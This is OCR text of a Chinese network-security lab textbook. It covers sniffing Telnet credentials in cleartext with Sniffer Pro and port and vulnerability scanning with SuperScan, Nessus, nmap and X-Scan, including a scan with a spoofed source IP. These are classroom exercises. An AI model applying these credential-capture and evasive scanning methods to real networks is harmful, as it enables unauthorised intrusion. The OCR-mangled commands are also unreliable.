00000030 1f ca 75 fb 00 00 50 41 53 53 20 61 be 6f be 79 ?.PÀSS anony 
00000040: bd 6 25 78 Od Oa ie 








Se) MS REDE, EMIT A Protocol Dist. 人 可 看 统计 表 为 这 当前 对 话 / 


图 336 对 捕获 的 数据 包 进行 解码 和 显示 














验 报 告 要 求 


a H AY 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 











3.3.3 Telnet 协议 分 析 


实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PC( Windows XP/Windows 7) ,每 组 2 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer Pro 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,掌握 利用 Sniffer Pro 软件 捕获 和 分 析 网 络 协议 的 具体 方法 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 


(1) Telnet 原理 及 基本 协议 。 
(2) 网 络 协议 分 析 技 术 的 综合 运用 。 


Sis p 


按照 实际 需要 ,定义 如 图 3. 3. 7 所 示 的 过 滤器 ,并 应 用 该 过 滤器 捕获 Telnet 协议 信息 。 
运行 数据 包 捕 获 功 能 。 








图 337 定义 Tanet 协 议 的 过 滤器 
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在 应 用 Telnet 方式 登录 远程 计算 机 之 前 ,需要 开启 Telnet 服务 。 如 果 计 算 机 安装 的 是 
Windows 7 操作 系统 , 则 需要 单独 下 载 Telnet. exe 程序 。 在 登录 远程 计算 机 时 ,需要 知道 
该 计算 机 的 用 户 名 和 密码 。 

有 关 该 项 目的 测试 ,可 以 选择 在 局 域 网 内 进行 分 组 练习 ,两 人 一 组 ,分 别 应 用 Telnet 方 
式 登 录 到 对 方 计算 机 ,如 图 3. 3. 8 和 图 3. 3. 9 所 示 。 


GX Telnet 192.168.1.225 








A338 远程 登录 界面 


GX Telnet 192. 168. 1. 225 


oft Telnet er 


Settings Wdministrator> 





A339 远程 连接 成 功 





由 于 Telnet 登录 时 口令 部 分 不 回 显 , 只 能 抓 取 从 客户 机 到 服务 器 的 报 文才 能 获取 明文 
口令 ,所 以 一 般 嗅 探 软 件 无 法 直接 看 到 口令 。 默 认 情 况 下 ,Telnet 登录 时 进入 字符 输入 模 
式 , 而 非 行 输入 模式 ,此 时 基本 上 是 客户 端 一 有 击 键 就 立即 向 服务 器 发 送 字 符 ,TCP 数据 区 
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为 1B。 嗅 探 结果 如 图 3.3. 10 所 示 。 


TCP. D-23 ACK-2868270633 VIN-65535 
Telnet: R 24 IAC Do Authentication 
Telnet: C IAC Will Authentication 
Telnet Of TAC SB 
Telnet IAC Do Echo 
Telnet TAC SB 

324 — ACK=2068270697 VIN=65471 


6 WIN=65403 


SRGESSSRSSESRRESRES 


PORT=3324 

PORT=3324 IAC SB 

S=3324 WIN=65029 
324 


a 
ACK=2868271140 VIN=65028 
PORT=3324 d 
PORT=3324 d 
5-3324 ACK=2868271141 VIN=65027 
C 324 a 


a 
ACK=2868271142 VIN=65026 


R PORT=3324 i 
5-3324 ACK=2868271143 VIN=65025 
RT-3324 n 

















Source port 
Destination port = 23 (Telnet) 
Initial sequence number = 2874519923 
Next expected Seq number- 2874519924 
Data offset = 28 bytes 








A 3310 嗅 探 结果 


客户 端 Telnet 到 服务 端 时 ,一 次 只 传送 1B 的 数据 ;由 于 协议 的 头 长 度 是 一 定 的 ,所 以 
Telnet 的 数据 包 大 小 =DLC(C14B) 十 IP(20B) 十 TCP(20B) 十 数据 (1B) , 共 55B, 因 此 ,可 以 
将 图 3.3.7 的 Packet Size 设 为 55, 以 便 捕 获 到 用 户 名 和 密码 ;如 图 3. 3. 11 所 示 , 设 定 为 仅 
捕获 客户 端 到 服务 端的 数据 包 , 过 滤 其 他 类 型 的 干扰 数据 包 。 


[orine Filter = Coptize 





BMD Broadcast/Multicast Address 
-Q Address Book 























图 3311 设 定 为 仅 捕获 客户 端 到 服务 端的 数据 包 


再 次 重复 捕获 过 程 , 即 可 显示 用 户 名 和 明文 密码 ,如 图 3. 3. 12 所 示 , 用 户 名 为 
administrator, 口 令 为 123456 。 
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ocal, Ethernet (Line speed at 100 Mbps) — [Snif2: Decode, 1/19 Ethernet Frames] 





图 3312 用 户 名 称 和 明文 密码 


思考 题 


(1) 如 何 捕获 HTTP 协议 下 的 用 户 名 和 密码 ? 
(2) 分 析 TCP 协议 的 头 结构 以 及 两 台 主机 之 间 建 立 连接 的 过 程 。 


实验 报告 要 求 


。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
阐述 遇 到 的 问题 以 及 解决 方法 。 
阐述 收获 与 体会 。 


3.3.4 多 协议 综合 实验 
实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7) .每 组 2 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协 议 的 有 关内 容 。 
(2) 复习 Sniffer Pro 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 
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实验 任务 

通过 本 实验 ,理解 和 掌握 Sniffer Pro 的 综合 应 用 ,明确 FTP、TCP ICMP 等 多 种 协议 
的 数据 传输 问题 。 理 解 主要 协议 的 结构 。 

实验 环境 


本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 所 有 PC 上 安装 的 都 是 Windows 
操作 系统 。 本 次 实验 需 在 小 组 合作 的 基础 之 上 完成 。 每 个 小 组 由 两 位 成 员 组 成 ,相互 之 间 
通信 ,通过 Sniffer Pro 工具 截取 通信 数据 包 , 分 析 数 据 包 ,完成 实验 内 容 。 

实验 步 又 

(1) 填写 小 组 情况 表 ,通过 ipconfig 命令 获取 本 机 IP 地 址 ,并 填写 表 3. 3. 1 。 

表 3.3.1 小 组 情况 表 
小 组 成 员 姓 名 机 器 IP 地 址 本 机 用 户 名 





A 192. 168. 1. 136 User36 
B 192. 168. 1.137 User37 





(2) 开启 Sniffer Pro 软件 , 自 定义 过 滤器 设置 ,并 进入 捕获 状态 。 
G) 从 本 机 ping 小 组 另 一 位 成 员 的 计算 机 ,使 用 Sniffer Pro 截取 ping 过 程 中 的 通信 
数据 。 
(4) 分 析 由 第 (3) 步 操作 而 从 本 机 发 送 到 目标 计算 机 的 IP 数据 ,并 填写 表 3. 3. 2。 
表 3.3.2 IP 数据 报表 
IP 协议 版 本 号 (IPv4/IPv6) 
服务 类 型 (使 用 中 文明 确 说 明 服务 类 型 ,比如 “要 求 最 大 吞吐 量 /b”) 
IP 报 文 头 长 度 /B 
数据 报 总 长 度 /B 
标识 
数据 报 是 否 要求 分 段 
分 段 偏 移 量 
在 发 送 过 程 中 经 过 几 个 路 由 器 
上 层 协 议 名 称 (ICMP) 
报 文 头 校 验 和 
源 地 址 (IP) 
目标 地 址 (IP) 






































(5) 分 析 由 第 (3) 步 操作 而 从 目标 计算 机 返回 到 本 机 的 数据 帧 中 的 IP 数据 ,并 填写 
33.3.2. 
« B2 5 


(6) 从 本 机 通过 telnet 命令 远程 登录 小 组 另 一 位 成 员 的 计算 机 ,然后 使 用 dir 命令 查看 
对 方 C 盘 根 目 录 下 的 文件 系统 结构 ,最 后 使 用 exit 命令 退出 。 使 用 Sniffer Pro 截取 操作 中 
的 通信 数据 。 

(7) 分 析 由 第 (6) 步 操作 而 从 本 机 发 送 到 目标 计算 机 的 数据 帧 中 的 TCP 数据 ,填写 
23.3.3. 

53.3.3. 通信 报表 
数据 发 送 端口 号 
通信 目标 端口 号 
TCP 报 文 序号 
TCP 报 文 确认 号 
下 一 个 TCP 报 文 序号 
标志 位 含义 (如 “确认 序号 有 效 ”) 
窗口 大 小 
校 验 和 
源 IP 地 址 
目标 IP 地 址 
































(8) 分 析 由 第 (6) 步 操作 而 从 目标 计算 机 返回 到 本 机 的 数据 帧 中 的 TCP 数据 ,并 填写 
表 3.3.3。 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 遇 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 


3.3.5 端口 扫描 与 嗅 探 实验 
实验 器 材 


Superscan 软件 系统 ,1 套 。 
Nessus 软件 系统 ,1 套 。 
PCCWindows XP/Windows 7).1 @. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer Pro 软件 的 操作 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 


(4) 做 好 预习 报告 。 
本 


使 用 多 种 工具 进行 端口 扫描 与 嗅 探 分 析 。 


硬件 环境 : 安装 Windows 2000 Server\Linux(Red Hat) 操 作 系统 的 计算 机 。 
软件 环境 : SuperScan\Nessus\X-Scan\nmap 等 工具 软件 。 


预备 知识 
学 习 计 算 机 网 络 有 关 知 识 , 熟 悉 X-Scan 等 多 种 分 析 工具 的 用 法 。 
3c Jp 


1. 使 用 SuperScan 进行 端口 扫描 
SuperScan 具有 端口 扫描 、 主 机 名 解析 和 Ping 扫描 的 功能 ,其 界面 如 图 3.3.13 所 示 。 


-. SuperScan 3.00 
Configuration 
Lookup. 
Port list setup 
Me | Interfaces 
Scan type 


Scan 
| stnfisz76812 +4 T7 Resolve hostnames Prona 
| 、 [一 一 一 习 || oo | | [€ Ony scan responsive pings 0 
| swophs216814 — 3] I Show host responses 


| Prevc | Nexc| 1.254 € Pngony 


C Every port in list Resolving 














Q. 
I Ignore IP zero @ All selected ports in list 0 
Stop 





Ignore IP 255 © AN ist ports from 
T^ Extract from file c [ston] 
Pel All ports hom 
Speed 
Max Active hosts 








3313 SuperScan 操作 界面 


1) 主机 名 解析 功能 

在 Hostname Lookup 栏 中 ,可 以 输入 IP 地 址 或 者 需要 转换 的 域名 , 单 击 Lookup 按钮 
就 可 以 获得 转换 后 的 结果 , 单 击 Me 可 以 获得 本 地 计算 机 的 IP 地 址 , 单 击 Interfaces 可 以 获 
得 本 地 计算 机 IP 的 详细 设置 。 

2) 端口 扫描 功能 
利用 端口 扫描 功能 .可 以 扫描 目标 主机 开放 的 端口 和 服务 。 在 IP 栏 中 ,在 start 中 输入 
开始 的 IP. Æ Stop 中 输入 结束 的 IP。 在 Scan type 栏 中 选中 All list ports from 1 to 65535, 
这 里 规定 了 扫描 的 端口 范围 ,然后 单 击 Scan 栏 中 的 Start 按钮 ,就 可 以 在 选择 的 IP 地 址 段 
内 扫描 不 同 主机 开放 的 端口 了 。 扫 描 完成 后 ,选中 扫描 到 的 主机 IP, 单 击 Expand all 按钮 
会 展开 每 台 主 机 的 详细 扫描 结果 。 例 如 ,从 图 3. 3. 14 中 可 以 看 到 ,主机 192. 168. 1. 2 中 共 
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开放 了 6 个 端口 。 扫 描 窗 口 右 侧 的 Active hosts 和 Open ports 分 别 显示 了 发 现 的 活动 主机 
和 开放 的 端口 数量 。 


二 SuperScan 3.00 [- fex) 
Hostname Lookup Configuration 


EER ie | Port list setup 
Resolved | Me | Interfaces 

IP. i Scan type Scan 
Stætfi9216812 4 [^ Resolve hostnames 


m————AR—. Iv. Only scan responsive pings 182 1681.2 0 
Stopfise16812 — 2] IV. Show host responses TEN 

C Ping only 19216812 0 
PrevC | New| 1.254 " 
C Every portin list Resolving | 
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Extract from fle c E 
pee [E || BLE] 
Speed 
Max 92.168 Active hosts 
Open ports 


Save 














Collapse all 
Expand all 
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图 3314 端口 扫描 结果 


SuperScan 也 提供 了 特定 端口 扫描 的 功能 ,在 Scan type 栏 中 选中 All selected ports in 
list ,就 可 以 按照 选 定 的 端口 执行 扫描 。 单 击 Configuration 栏 中 的 Port list setup 按钮 即 可 
进入 端口 配置 界面 ,如 图 3. 3. 15 所 示 。 选 中 Select ports 栏 中 的 某 个 端口 ,在 左上 角 的 
Change/add/delete port info 栏 中 会 出 现 这 个 端口 的 信息 ,选中 Selected 复 选 框 ,然后 单 击 
Apply 按钮 就 可 以 将 此 端口 添加 到 扫描 的 端口 列表 中 。Add 和 Delete 按钮 可 以 添加 或 者 
删除 相应 的 端口 。 然 后 单 击 Port list file 栏 中 的 Save 按钮 ,会 将 选 定 的 端口 列表 存 为 一 个 
. 1st 文件。 默认 情况 下 ,SuperScan 有 scanner. Ist 文件 ,包含 了 常用 的 端口 列表 ,还 有 一 个 
trojans. lst 文件 ,包含 了 常见 的 木马 端口 列表 。 通 过 端口 配置 功能 ,SuperScan 提供 了 对 特 





Edit Port List 
Change/add/delete port info Port list file 
Port 1 {Selected 三 | [IT 


Description [TCP Port Service Muliplexer Load | weoe | Save | 
Program > 
一 Select ports 


Params 
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图 3315 端口 配置 界面 





定 端口 的 扫描 ,节省 了 时 间 和 资源 ,通过 对 木马 端口 的 扫描 ,可 以 检测 目标 计算 机 是 否 被 种 
植木 马 。 

3) Ping 功能 

SuperScan 软件 的 Ping 功能 提供 了 检测 在 线 主机 和 判断 网 络 状况 的 作用 。 通 过 在 IP 
栏 中 输入 起 始 和 结束 的 IP 地 址 ,然后 选中 Scan type 栏 中 的 Ping only 即 可 单 击 Start 按钮 
启动 Ping $438 T. Æ IP £5. Ignore IP zero Fil Ignore IP 255 分 别 用 于 屏蔽 所 有 以 0 和 255 结尾 
的 IP 地 址 , 单 击 PrevC 和 NextC 按钮 可 直接 转换 到 前 一 个 或 者 后 一 个 C 类 IP 网 段 。“1..254” 
按钮 则 用 于 直接 选择 整个 网 段 。 在 Timeout 栏 中 可 根据 需要 选择 不 同 的 响应 时 间 。 

2. 使 用 Nessus 进行 扫描 

Nessus 是 UNIX 操作 系统 中 常用 的 扫描 工具 。 它 是 基于 GPL 开发 的 ,可 扩展 性 强 , 当 
一 个 新 的 漏洞 被 公布 后 ,很 快 就 可 以 下 载 其 新 的 插件 ,以 支持 网 络 的 安全 性 检查 。 

1) 安装 Nessus 

在 Linux 下 安装 Nessus, 进 行 扫描 实验 。 安 装 文件 名 是 nessus-installer. sh, 使 用 shell 
来 执行 它 ,输入 sh nessus-installer. sh, 然 后 系统 就 开始 安装 。 在 安装 过 程 中 ,安装 程序 会 
提示 用 户 设置 安装 路 径 信息 ,每 次 设置 好 后 按 回 车 键 就 会 继续 安装 ,最 后 系统 提示 : 

Congratulations ! Nessus is now installed cn this host 

. Create a nessusd certificate using /usr/local/sbin/nessus- mkcert 

. Add a nessusd user use /usr/local/sbin/nessus- adduser 

. Start the Nessus daemon (nessusd) use /usr/local/sbin/nessusd - D 

. Start the Nessus client (nessus) use /usr/local/bin/nessus 

. To uninstall Nessus, use /usr/local/sbin/uninstall- nessus 

. Remenber to invoke 'nessus- update- plugins' periodically to update your list of 

plugins 

. A step by step dero of Nessus is available at : 

http://www.nessus .org/demo/ 

Press ENIER to quit 

这 就 表明 安装 成 功 。 

2) 配置 Nessus 

Nessus 包含 服务 器 端 和 客户 端 ,第 一 次 使 用 时 要 先 配置 一 个 账号 ,使 用 命令 nessus- 
adduser 来 建立 一 个 名 为 zx, 密码 是 2222 的 账号 (可 随意 设 ) ,这 就 是 服务 器 的 账号 密码 。 
使 用 nessus-mkcert 程序 设置 CA( 基 本 选择 默认 设置 ) 。 然 后 使 用 命令 nessusd -D 打开 服 
务 器 的 进程 (该 控制 台 放 在 后 台 运 行 ) 。 

3) 运行 Nessus 

再 打开 一 个 新 的 控制 台 ,输入 nessus 命令 ,这 是 第 一 次 使 用 Nessus, 它 会 提示 用 户 输入 
一 个 密码 ,这 是 客户 的 密码 ,输入 以 后 会 弹出 一 个 图 形 化 的 登录 界面 ,如 图 3. 3. 16 所 示 。 

Nessusd Host: 就 是 服务 器 所 在 的 主机 ,在 哪 台 主机 上 运行 了 nessus -D 就 填 其 IP 地 
址 ,由 于 要 扫描 的 是 本 机 漏洞 ,所 以 就 是 localhost; 

Port: 采用 默认 的 1241. 

Encryption; 采用 默认 值 。 

Login; 填 上 运行 nessus -P 时 的 账号 名 。 
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Nessusd host | Plugins | Prefs. | Scan 





New session setup 





3 Nessusd Host :| localhost 





Port :|1241 











Encryption : | twofish/ripemd1 60:3 


























Start the scan Load report Quit 





图 3316 Nessusd host 设置 界面 


然后 单 击 Log in 按钮 ,大概 几 秒 后 ,就 可 以 看 到 connected 的 字样 了 ,这 就 表明 连接 成 
功 了 。 当 然 , 第 一 次 登录 它 会 问 服务 器 的 密码 ,只 需 确认 一 次 即 可 ,下 回 启动 就 不 再 询问 了 。 

4) 选择 Plugins 标签 

Plugins 是 设 定 要 检查 的 插件 ,如 图 3. 3. 17 所 示 ,使 用 者 可 以 设置 要 检查 的 系统 漏洞 ， 
要 注意 的 是 ,如 果 上 一 步 没 有 连接 上 主机 ,Plugins 项 里 是 空 的 。 

5) 选择 Prefs. 标签 

如 图 3. 3. 18 所 示 ,Prefs. 选项 用 于 选择 是 否 对 远程 主机 进行 Ping 测试 以 及 TCP 扫描 
方式 , 它 提 供 了 TCP 全 连接 、SYN 扫描 、FIN 扫描 和 Xmas 扫描 等 几 种 方法 ,其 中 Xmas A 
描 和 FIN 扫描 类 似 , 属 于 秘密 扫描 技术 的 变种 。 

6) 选择 Scan options 标签 

如 图 3. 3. 19 所 示 , 设 置 扫描 端口 范围 是 1~15000, 这 样 就 包括 了 大 部 分 的 端口 。 这 里 
还 调整 最 大 线程 数 为 8, 如 果 该 选项 的 值 太 大 ,有 时 容易 造成 死机 现象 。 端 口 扫描 方式 可 根 
据 需要 进行 选择 ,在 这 里 选择 Nmap tcp connect() scan 这 种 方式 。 需 要 解释 的 是 ,nmap 是 
一 种 功能 强大 的 基于 命令 行 界面 的 扫描 工具 ,Nessus 提供 了 通过 调用 nmap 工具 进行 扫描 
的 功能 。 

端口 扫描 方式 大 部 分 都 在 原理 部 分 进行 了 介绍 ,此 外 还 有 一 种 FTP bounce scan 方式 ， 
即 FTP 返回 扫描 方式 ,在 这 种 方式 中 ,入 侵 者 利用 FTP 协议 的 代理 FTP 连接 功能 连接 到 
一 个 代理 FTP 服务 器 进行 端口 扫描 。 该 方式 隐蔽 性 强 , 但 速度 很 低 。 

7) 选择 Target selection 标签 

如 图 3. 3. 20 所 示 , 这 里 填 入 要 扫描 的 主机 的 IP 地 址 就 可 以 了 。 
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User 标签 和 Credits 标签 一 般 不 用 设置 ,选择 默认 值 就 行 了 。 

8) 开始 扫描 

单 击 Start the scan 按钮 ,Nessus 就 开始 扫描 目标 主机 了 ,如 图 3. 3.21 所 示 。 
9) 扫描 结果 

扫描 结束 后 ,弹出 扫描 结果 窗口 .如 图 3. 3.22 所 示 。 
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图 3321 扫描 过 程 
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microsoft-ds (445/tcp) 








ə Security Note 
















have the FIN flag set. 


Risk factor : Medium 


The remote host does not discard TCP SYN packets which 


Depending on the kind of firewall you are using, an 
attacker may use this flaw to bypass its rules. 


See also : http://archives.neohapsis.com/archives/bugtraq/2\ 
http://www.kb.cert.org/vuls/id/464113 


Solution : Contact your vendor for a patch 





























Close window 





图 3322 扫描 结果 窗口 





在 扫描 结果 窗口 中 ,不 同 风险 级 别 的 端口 及 协议 被 清晰 地 标示 出 来 。 


其 中 Security Note 是 安全 注释 ,Security Warning 是 安全 警告 ,Security holes 是 安全 
漏洞 ,再 展开 其 中 的 一 项 ,例如 Security holes ,可 以 看 到 关于 漏洞 的 具体 说 明和 解释 。 还 可 
以 单 击 下 面 的 Save report 按钮 ,把 这 次 扫描 结果 保存 为 某 种 格式 。 如 果 保 存 为 NSR 格式 ， 
用 命令 nussesd -r *. nsr 打开 某 个 扫描 结果 ;如 果 保 存 为 HTTP 格式 ,直接 用 浏览 器 打 





可 以 
开 即 可 。 
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3. 使 用 nmap 进行 扫描 

nmap 是 Linux 下 的 网 络 扫描 和 嗅 探 工具 包 , 可 以 帮助 网 管 人 员 深 入 探测 UDP 或 者 
TCP 端口 ,直至 主机 所 使 用 的 操作 系统 ;还 可 以 将 所 有 探测 结果 记录 到 各 种 格式 的 日 志 中 ， 
为 系统 安全 服务 。 其 基本 功能 有 3 个: 一 是 探测 一 组 主机 是 否 在 线 ;二 是 扫描 主机 端口 , 嗅 
探 所 提供 的 网 络 服务 ;三 是 可 以 推断 主机 所 用 的 操作 系统 。nmap 可 用 于 扫描 仅 有 两 个 节 

点 的 LAN, 还 可 以 扫 撒 500 个 节点 以 上 的 网 络 。nmap 还 允许 用 户 定 制 扫 描 技巧 。 通 常 ,一 

个 简单 的 使 用 ICMP 协议 的 ping 操作 可 以 满 ROMER. 

(1) 检查 nmap 是 否 已 安装 。 

在 命令 行 界面 中 输入 以 下 命令 








rpm -q map 
返回 结果 如 图 3. 3. 23 所 示 


root@redhatT3;~ 











图 3323 用 rpm 命令 检查 nmep 的 安装 情况 








(2) 也 可 以 使 用 whereis 命令 (whereis nmap) 或 者 find 命令 (find /-name nmap) 来 验 
证 nmap 是 否 已 安装 及 其 位 置 ,如 图 3. 3. 24 所 示 


f root@redhatT3:~ E = 上 口 | xj 





























图 3324 where is 命令 检查 nmap 的 安装 位 置 








(3) 如 果 没 有 以 上 返回 信息 ,说 明 nmap 尚未 安装 。 在 获得 nmap 安装 包 后 ,使 用 以 下 
命令 进行 安装 : 


rgm-irmap-2 3EPTN4-1 i386.rpm 
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(A) 执行 命令 /usr/bin/nmap -h 以 获得 帮助 信息 ,如 图 3. 3. 25 所 示 。 








^x] 








3325 获取 nmap 帮 助 信息 





(5) 执行 以 下 命令 进行 连通 性 检测 : 
Imap - SP 192.168.0. * 
其 中 192. 168. 0 为 当前 网 段 。 运 行 结果 如 图 3. 3. 26 Bron. 


F root@redhat73:~ 
r 
E MAN 





图 3326 nmap 连 通 性 检测 


(6) 执行 以 下 命令 进行 端口 扫描 ,注意 观察 开放 的 端口 号 : 


mgp - SS 192.168.1.x 


x 为 合作 伙伴 座位 号 ,在 本 例 中 为 159。 执 行 结果 如 图 3. 3. 27 所 示 。 
(7) 使 用 nmap fy) TCP/IP 探测 功能 查询 合作 伙伴 的 系统 信息 ,命令 如 下 : 


namp -O 192.168.0.x 


x 为 合作 伙伴 座位 号 ,在 本 例 中 为 159。 执 行 结果 如 图 3.3.28 所 示 。 

(8) 注意 返回 的 信息 . 接 下 来 使 用 同样 的 方法 查询 教师 机 的 系统 信息 ,在 返回 信息 中 应 
该 看 到 教师 机 的 开放 端口 和 操作 系统 信息 ,这 些 数据 一 旦 被 攻击 者 获得 ,就 有 可 能 导致 被 攻 
击 和 破坏 。 

(9) 使 用 参数 U 检测 NT 下 的 UDP 端口 : 








Imap - SU 192.168.0.x 
* 92 * 





图 3327 nmep 端 口 扫 描 


;f root@redhatT: 





图 3328 nmap 查 询 伙伴 系统 信息 
x 为 合作 伙伴 座位 号 。 执 行 结 果 如 图 3. 3. 29 所 示 


P root@redhatT3:~ 

















413329 nmep 检 测 NT 下 的 UDP 端口 








CLO) 输入 以 下 命令 ,检测 端口 信息 ,同时 伪造 源 IP 地 址 ,这 样 做 不 仅 获得 了 端口 信息 ， 
同时 还 使 得 检测 方 不 会 被 轻易 发 现 . 跟 踪 。 


Imap - SS 192.168.0.159 - S 192.168.0.34 - e eth0 - PO 


执行 结果 如 图 3. 3. 30 所 示 。 


redhat 








PR 
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4. 使 用 X-Scan 进行 漏洞 检测 

X-Scan 是 由 安全 i(Xfocus Team) 开 发 的 一 个 功能 强大 的 扫描 工具 。 它 采用 多 线程 
方式 对 指定 TP 地 址 段 ( 或 单机 ) 进 行 安全 漏洞 检测 ,支持 插件 功能 ,提供 了 图 形 界面 和 命令 
行 两 种 操作 方式 ,扫描 内 容 包 括 远程 服务 类 型 .操作 系统 类 型 及 版 本 、 各 种 弱 口 令 漏 洞 . 后 
门 pen 务 漏洞 .网 络 设 备 漏洞 .拒绝 服务 漏洞 等 二 十 几 个 大 类 。 






) 运行 主 程序 
X-Scan 主 程序 窗口 上 方 的 功能 按钮 包括 扫描 模块 .开始 扫描 、 和 暂停 扫描 、 终 止 扫描 、 检 
测报 告 . 使 用 说 明 ,在 线 升级 、 退 出 ,如 图 3. 3.31 所 示 。 
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系统 要 求 : Windows NT/2000/XP/2003 
理论 上 可 运行 于 Windows 机 系列 拘 作 系统 ， 推 荐 运行 于 Windows 2000 以 上 的 Server 版 Windows 系 统 。 
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获取 详细 资料 : “http://www. xfocus. net/projects/X-Scan/index heal” 
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2) 扫描 参数 设置 

选择 “设置 "菜单 下 的 “扫描 参数 ”命令 ,弹出 “扫描 参数 ”窗口 ,在 “检测 范围 ”中 的 “指定 
IP 范围 "文本 框 中 输入 要 检测 的 目标 主机 的 域名 或 IP 地 址 ,也 可 以 对 多 个 IP 地 址 进行 检 
测 。 例 如 ,输入 192. 168. 0. 1-192. 168. 0. 255, 对 这 个 网 段 的 主机 进行 检测 ,如 图 3. 3. 32 所 示 。 


92. 166.0. 1-192. 168. 0. 255 
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在 “全 局 设置 ”中 ,可 以 选择 线程 和 并 发 主机 数量 ,如 图 3. 3. 33 所 示 。 在 “其 他 设置 "中 
还 有 “ 跳 过 没有 响应 的 主机 ”和 “无 条 件 扫 描 ”, 如 果 设 置 了 “ 跳 过 没有 响应 的 主机 ”, 当 对 方 禁 
lE T Ping 或 防火 墙 设置 使 对 方 没 有 响应 的 时 候 ,X-Scan 会 跳 过 当前 主机 ,自动 检测 下 一 台 
主机 。 如 果 选 择 “ 无 条 件 扫 描 ”,X-Scan 会 对 目标 进行 详细 检测 ,这 样 结果 会 比较 详细 ,也 会 
更 加 准确 ,但 扫描 时 间 会 延长 。 通 常 对 单一 目标 会 使 用 这 个 选项 。 
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。95。 


在 “端口 相关 设置 "中 可 以 自 定义 一 些 需 要 检测 的 端口 ,如 图 3. 3. 34 所 示 。 检 测 方式 有 
TCP 和 SYN 两 种 ,TCP 方式 容易 被 对 方 发 现 .但 准确 性 要 高 一 些 ,SYN 则 相反 。 





图 3334 XScan 端 口 相关 设置 


“SNMP 相关 设置 ?主要 是 针对 SNMP 信息 的 一 些 检测 设置 。 

“NETBIOS 相关 设置 "是 针对 Windows 系统 的 NETBIOS 信息 的 检测 设置 ,包括 的 项 
目 有 很 多 种 ,根据 需求 选择 实用 的 即 可 。 

“漏洞 检测 脚本 设置 "主要 是 选择 漏洞 扫描 时 所 用 的 脚本 ,如 图 3. 3. 35 所 示 。 





图 3335 XScan 的 加 载 脚 本 


如 果 需 要 同时 检测 很 多 主机 ,可 以 根据 实际 情况 选择 特定 的 脚本 ,如 图 3. 3. 36 所 示 。 

“CGI 相关 设置 "“ 网 络 设置 "和 以 前 的 版 本 区 别 不 大 ,使 用 默认 的 就 可 以 。 

“字典 文件 设置 ?是 X-Scan 自 带 的 一 些 用 于 破解 远程 账号 所 用 的 字典 文件 ,这 些 字典 都 
. 96 。 
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图 3338 XScan 脚本 设置 


是 简单 或 系统 默认 的 账号 等 。 可 以 选择 自己 的 字典 或 手工 对 默认 字典 进行 修改 ,如 图 3. 3. 37 
所 示 。 默 认 字 典 存 放 在 DAT 文件 夹 中 。 字 典 文件 越 大 ,探测 时 间 越 长 。 








图 3337 字典 设置 


3) 扫描 模块 设置 

“扫描 模块 ?用 于 检测 对 方 主机 的 一 些 服务 和 端口 等 情况 。 可 以 全 部 选择 或 只 检测 部 分 
服务 ,如 图 3. 3. 38 所 示 。 

4) 开始 扫描 

设置 好 以 上 两 个 模块 以 后 , 单 击 主 界面 中 的 开始 扫描 按钮 就 可 以 了 。X-Scan 会 对 对 方 主 
机 进行 详细 的 检测 ,如 图 3. 3. 39 所 示 。 如 果 扫 描 过 程 中 出 现 错误 ,会 在 “错误 信息 ”中 看 到 。 

5) 结束 扫描 

在 扫描 过 程 中 ,如 果 检 测 到 漏洞 .可 以 在 “漏洞 信息 ”中 察看 。 扫 描 结 束 以 后 会 自动 弹出 
检测 报告 ,包括 漏洞 的 风险 级 别 和 详细 的 信息 ,以 便 对 对 方 主机 进行 详细 的 分 析 。 
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图 3339 开始 扫描 
实验 报告 要 求 
。 实验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
3.3.6 局 域 网 信息 嗅 探 实验 
实验 器 材 


微型 计算 机 ,1 台 。 
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预习 要 求 


CD 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 嗅 探 软件 的 使 用 与 原理 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 
熟悉 嗅 探 软件 的 使 用 与 原理 。 使 用 Ethereal 检测 网 络 环境 , 抓 包 、 嗅 探 并 分 析 扫 描 结 


果 。 通 过 实验 掌握 Sniffer Pro 工具 的 安装 及 使 用 ,理解 TCP/IP 协议 中 TCP,IP,ICMP 数 
据 包 的 结构 ,了 解 网 络 中 各 种 协议 的 运行 状况 。 


实验 环境 
硬件 环境 : 安装 Windows 2000 Server 操作 系统 或 Linux 操作 系统 的 计算 机 ,局 域 网 


环境 。 
软件 环境 : Ethereal for Linux or Windows\Sniffer Pro 4. 7. 530, 


实验 步 又 

1. 使 用 Ethereal 进行 抓 包 并 分 析 数 据 包 格式 

Ethereal 是 Linux 下 的 一 个 自 带 工具 , 若 要 将 其 安装 到 Windows 平台 下 , 需 安装 相应 
的 补丁 。 

安装 : 找到 支持 Windows 的 Ethereal 版 本 和 补丁 安装 到 Windows 平台 下 ,安装 过 程 
与 普通 安装 程序 相同 。 

单 击 “ 开 始 ” 一 “程序 ”一 Ethereal 一 Ethereal 运行 程序 ,如 图 3. 3. 40 所 示 。Ethereal 的 
主 界 面 如 图 3. 3. 41 所 示 。 
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@ The Ethereal Network Analyzer Ael xi 


File Edit Capture Display Tools Help | 
